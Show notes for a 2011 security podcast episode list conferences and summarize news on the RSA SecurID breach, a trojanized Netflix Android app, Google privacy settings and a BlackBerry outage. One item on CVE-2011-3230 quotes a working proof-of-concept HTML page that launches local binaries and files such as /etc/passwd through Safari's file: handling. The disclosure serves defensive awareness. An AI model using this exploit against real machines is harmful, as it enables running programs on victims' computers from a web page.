InfoSec Daily Podcast Episode 495 for Friday, October 14, 2011. Tonight's podcast is hosted by Karthik Rangarajan, Boris Sverdlik, Geordy Rostad, and Dr. b0n3z.
Announcements:
Hack3rCon 2011
When: October 21-23rd, 2011
Where: the Charleston House Hotel and Conference Center
http://www.hack3rcon.org/
NordSec 2011
When: October 26–28, 2011
Where: Tallinn Science Park “Tehnopol”, Tallinn, Estonia
http://nordsec2011.cyber.ee/
New Hampshire InfoSec Tweetup
When: October 29, 2011
Where: Pawtuckaway State Park in Nottingham, NH
http://nhinfosectweetup.eventbrite.com/
( It is just a gathering of security professionals and their families. No talks, just abunch of likeminded people and some good food.)
SkyDogCon
When: Nov 4th – Nov 6th
Where: Holiday Inn Airport, Nashville, TN
http://www.skydogcon.com
Phreaknic
When: Nov 4th – Nov 6th
Where: Days Inn Stadium, Nashville, TN
http://www.phreaknic.info
BSidesDFW 2011
When: November 5th, 2011
Where: Microsoft Technology Center Dallas
http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
Cost = FREE
2011 Fall Information Security Conference
When: November 8 – 9, 2011
Where: Atlanta, GA (Loudermilk Conference Center)
http://www.gaissa.org
BSides Delaware
When: November 11-12, 2011
Where: Wilmington University, Delaware Campus
http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
SANS Mentoring: Forensics 408 – Computer Forensic Essentials
When: Starts November 30, 2011
Where: Atlanta, GA
Discount Code: M1011IPAD (free iPad 2)
http://www.sans.org/mentor/details.php?nid=25504
Stories:
Source: http://nakedsecurity.sophos.com/2011/10/11/rsa-blames-nation-state-attack/
RSA has revealed that it believes two groups, working on behalf of a single nation state, hacked into its servers and stole information related to the company's SecurID two-factor authentication products.
Speaking at the RSA Security Conference in London, RSA's executive chairman Art Coviello described the high profile attack that made headlines around the world.
"There were two individual groups from one nation state, one supporting the other. One was very visible and one less so.. We've not attributed it to a particular nation state although we're very confident that with the skill, sophistication and resources involved it could only have been a nation state."
Inevitably, people are likely to assume that China might have been involved in the attack – but there's nothing in RSA's statements to either implicate China or to back-up the claims that any country was involved.
It seems very odd to me for a company to say that they have determined that a country had attacked them, but to not then name the country.
You will probably remember that RSA didn't do itself many favours when it first admitted the breach in April, playing its cards rather close to its chest then, and not saying much more about the ongoing security of its tokens than:
"we are confident that the information extracted does not enable a successful direct attack on any of our RSA SecurID customers."
Unfortunately, the truth was that RSA's server breach did subsequently lead to another attack against a leading US military contractor, and the security firm's hand was forced into offering to replace some customers' SecurID devices.
The malware attack
RSA was struck by a targeted malware attack, emailed to a small number of their employees.
Attached to the email was a file, "2011 Recruitment plan.xls". The poorly worded email was designed to trick users into opening the attachment. And – unfortunately – at least one of them fell for the trap.
The Excel spreadsheet had been boobytrapped, and contained a malicious Flash payload inside it. Opening the file exploited an Adobe zero-day vulnerability that then downloaded a remote access Trojan horse called Poison Ivy onto the computer.
Once the Trojan horse was in place, the hackers could begin to steal information and inveigle their way into RSA's network infrastructure.
APT or not?
At the time of the initial disclosure, RSA's Coviello described the attack as an "extremely sophisticated" Advanced Persistent Threat (APT).
Some wags in the security industry have noted that corporate victims of malware attacks might like to use the "APT" buzzword to make a breach seem less embarrassing.
Whether that's fair or not is open to debate. But it certainly puts a better spin on things if you claim that highly-skilled hackers with the resources of an unnamed country attacked your computer network rather than your common-or-garden cybercriminal.
Source: https://www.net-security.org/malware_news.php?id=1873
When Netflix released an Android client app earlier this year, it also witnessed the attempts of various app developers who tried to make a pirated copy of it work on other devices and platforms.
As unwelcome as this development was, the situation has been made even worse as cyber criminals have also taken advantage of this gap between supply and demand and have pushed out a Trojanized version of the app bent on stealing the users' account login credentials.
"Despite the fact that there are multiple permissions being requested at the time of installation – identical to the permissions required by the actual app – our analysis shows that this is, in fact, a red herring, probably used to add to the illusion that the end user is dealing with the genuine article," point out Symantec researchers.
Once the victim enters his account credentials, the information is automatically sent to a remote server which is, luckily, currently offline. Also, the Trojanized app doesn't react any differently when the incorrect email/password combination is entered.
After the "Sign In" button is pressed, the user is faced with a screen saying that the app is incompatible with his device and urges him to download a different app, but doesn't link to it or attempt to download it automatically.
A click on the "Cancel" button below that explanation triggers the uninstall process. "Any attempt to prevent the uninstall process results in the user being returned to the previous screen with the incompatibility message," say the researchers.
Source: http://1dave1cup.com/
Please ignore how nasty that url sounds, it’s actually legitimate. Since early in the year, our own Dave Kennedy has been teaching some preparation classes for the Offensive Security Ohio Chapter. If you dare follow that link, you will find audio and video recordings of these classes that will attempt to bring you up to speed for obtaining some of the Offensive Security certifications such as the OSCP. If you happen to be near North Canton, Ohio you can actually attend these classes live but I have to warn you that you will probably be extremely lost without going through(and fully comprehending) all of the audio and video to date. The OSCP/OSCE/OSWP are heavy duty certs that even some of the biggest names in the industry have walked away from crying. If you intend to attempt these certs, it’s well worth your time to watch/listen to this series to help minimize the pain.
Source: https://www.google.com/intl/en/privacy/tools.html
Someone from Google pointed my attention to this page the other day. It’s the Google privacy center. They have consolidated links to all of their privacy tools in one place. In here you’ll find links to things such as Street View blurring, the Data Liberation Front, information on Encrypted Search and much more. The one particular item that my anonymous friend from Google pointed out was something called “Search Personalization Opt Out”. Clicking this link leads to a page referring to turning off search history personalization.
Apparently he heard me ranting about this the other day on ISD and wanted to steer me in the right direction. This is what the page says:
“Turning off search history personalization:
Google sometimes customizes your search results based on your past search activity on Google. This customization includes searches you've done and results you've clicked. Since personalized search treats signed-in and signed-out users differently, the instructions for turning off search history personalization are a little different in each case.
Signed in searches
To disable history-based search customizations while signed in, you'll need to remove Web History from your Google Account. You can also choose to remove individual items. Note that removing this service deletes all your old searches from Web History.
Signed out searches
If you aren't signed in to a Google Account, your search experience will be customized based on past search information linked to a cookie on your browser. To disable these types of customizations, follow these steps:
- In the top right corner of the search results page, click the
Web History.
- On the resulting page, click Disable customizations based on search activity.(Because this preference is stored in a cookie, it'll affect anyone else who uses the same browser and computer as you).
Or, if you'd rather just delete the current cookie storing searches from your browser and start fresh, clear your browser's cookies.
Note: If you've disabled search customizations, you'll need to disable it again after clearing your browser cookies; clearing your Google cookie turns on history-based customizations.”
Sounds fine and dandy until you stop and analyze it a bit more. Looking at the “signed in” searches section, you’ll notice that they have you removing your web history from the account. But now say that you are still surfing while signed in, what’s to stop it from building back up again? What I would like to see from Google is an actual checkbox that says “Don’t collect web history”. It seems like they continue to dance around that issue.
Source: http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html
There's not a ton to say about this bug aside from "Yikes"! I think the PoC speaks for itself. This allows you to send any "file:" url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page. The only caveat is that since LaunchServices will check for the quarantine bit, you cannot directly push a binary to the browser and launch it. Other than that, you can run or launch anything you can access by using the method in the html provided below.
|
<html> <head> <base href="file://"> <script> function DoIt() { alert(document.getElementById("cmdToRun").value); document.location=document.getElementById("cmdToRun").value; } </script> </head> <body> <select id="cmdToRun"> <option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option> <option value="/etc/passwd">Launch /etc/passwd</option> <option value="/Applications/Utilities/Bluetooth File Exchange.app"> Launch Bluetooth File Exchange.app</option> </select> <br /> <input type=button value="Launch" onclick="DoIt()"> <br /> </body> </html> |
Apple's advisory: http://support.apple.com/kb/HT5000
Source: http://threatpost.com/en_us/blogs/rim-exec-says-blackberry-service-wasnt-hackedreally-101311
Research in Motion CTO David Yach said that the rolling service outages that its Blackberry mobile phone system has experienced in the last few days wasn't due to a security compromise, but to an unsuccessful fail over following a core switch failure in Europe.
"I know there's often speculation in these types of situations of a potential breach or hack as the cause" Yach offered on Thursday. But he assured those listening that the Blackberry service didn't appear to have been hacked. "We've seen no evidence that this is the case," he said.
Instead, the company is dealing with a backlog of untold numbers of unsent messages.
"A large backlog of messages has been generated. We've had to throttle traffic to stabilize service while we process the substantial backlog of messages in a controlled manner. That's why we're seeing ongoing issues and impacts to other regions of the world," Yach said on the call, an excerpt of which was posted by the BBC.